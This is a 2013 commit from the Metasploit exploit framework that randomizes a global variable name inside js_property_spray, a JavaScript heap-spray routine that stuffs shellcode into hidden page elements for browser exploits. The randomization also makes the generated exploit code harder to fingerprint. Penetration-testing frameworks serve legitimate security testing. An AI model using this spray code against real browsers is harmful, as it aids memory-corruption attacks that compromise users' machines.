Randomize the "div_container" var because it's global

sinn3r · sinn3r · commit 566806487c73 · 2013-03-22T13:16:14.000-05:00
It's best to randomize this variable name because it's global.
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
@@ -813,8 +813,9 @@ def js_base64
 	#   </script>
 	#
 	def js_property_spray
+		sym_div_container = Rex::Text.rand_text_alpha(rand(10) + 5)
 		js = %Q|
-		var div_container;
+		var #{sym_div_container};
 		function sprayHeap( oArg ) {
 
 			shellcode     = oArg.shellcode;
@@ -830,13 +831,13 @@ def js_property_spray
 
 			if (offset > 0x800) { throw "Bad alignment"; }
 
-			div_container = document.getElementById(objId);
+			#{sym_div_container} = document.getElementById(objId);
 
-			if (div_container == null) {
-				div_container = document.createElement("div");
+			if (#{sym_div_container} == null) {
+				#{sym_div_container} = document.createElement("div");
 			}
 
-			div_container.style.cssText = "display:none";
+			#{sym_div_container}.style.cssText = "display:none";
 			var data;
 			junk = unescape("%u2020%u2020");
 			while (junk.length < offset+0x1000) junk += junk;
@@ -850,7 +851,7 @@ def js_property_spray
 			{
 				var obj = document.createElement("button");
 				obj.title = data.substring(0, (heapBlockSize-2)/2);
-				div_container.appendChild(obj);
+				#{sym_div_container}.appendChild(obj);
 			}
 		}
 		|

Original file line number	Diff line number	Diff line change
`@@ -813,8 +813,9 @@ def js_base64`
`813`	`813`	`# </script>`
`814`	`814`	`#`
`815`	`815`	`def js_property_spray`
	`816`	`+ sym_div_container = Rex::Text.rand_text_alpha(rand(10) + 5)`
`816`	`817`	`js = %Q\|`
`817`		`- var div_container;`
	`818`	`+ var #{sym_div_container};`
`818`	`819`	`function sprayHeap( oArg ) {`
`819`	`820`
`820`	`821`	`shellcode = oArg.shellcode;`
`@@ -830,13 +831,13 @@ def js_property_spray`
`830`	`831`
`831`	`832`	`if (offset > 0x800) { throw "Bad alignment"; }`
`832`	`833`
`833`		`- div_container = document.getElementById(objId);`
	`834`	`+ #{sym_div_container} = document.getElementById(objId);`
`834`	`835`
`835`		`- if (div_container == null) {`
`836`		`- div_container = document.createElement("div");`
	`836`	`+ if (#{sym_div_container} == null) {`
	`837`	`+ #{sym_div_container} = document.createElement("div");`
`837`	`838`	`}`
`838`	`839`
`839`		`- div_container.style.cssText = "display:none";`
	`840`	`+ #{sym_div_container}.style.cssText = "display:none";`
`840`	`841`	`var data;`
`841`	`842`	`junk = unescape("%u2020%u2020");`
`842`	`843`	`while (junk.length < offset+0x1000) junk += junk;`
`@@ -850,7 +851,7 @@ def js_property_spray`
`850`	`851`	`{`
`851`	`852`	`var obj = document.createElement("button");`
`852`	`853`	`obj.title = data.substring(0, (heapBlockSize-2)/2);`
`853`		`- div_container.appendChild(obj);`
	`854`	`+ #{sym_div_container}.appendChild(obj);`
`854`	`855`	`}`
`855`	`856`	`}`
`856`	`857`	`\|`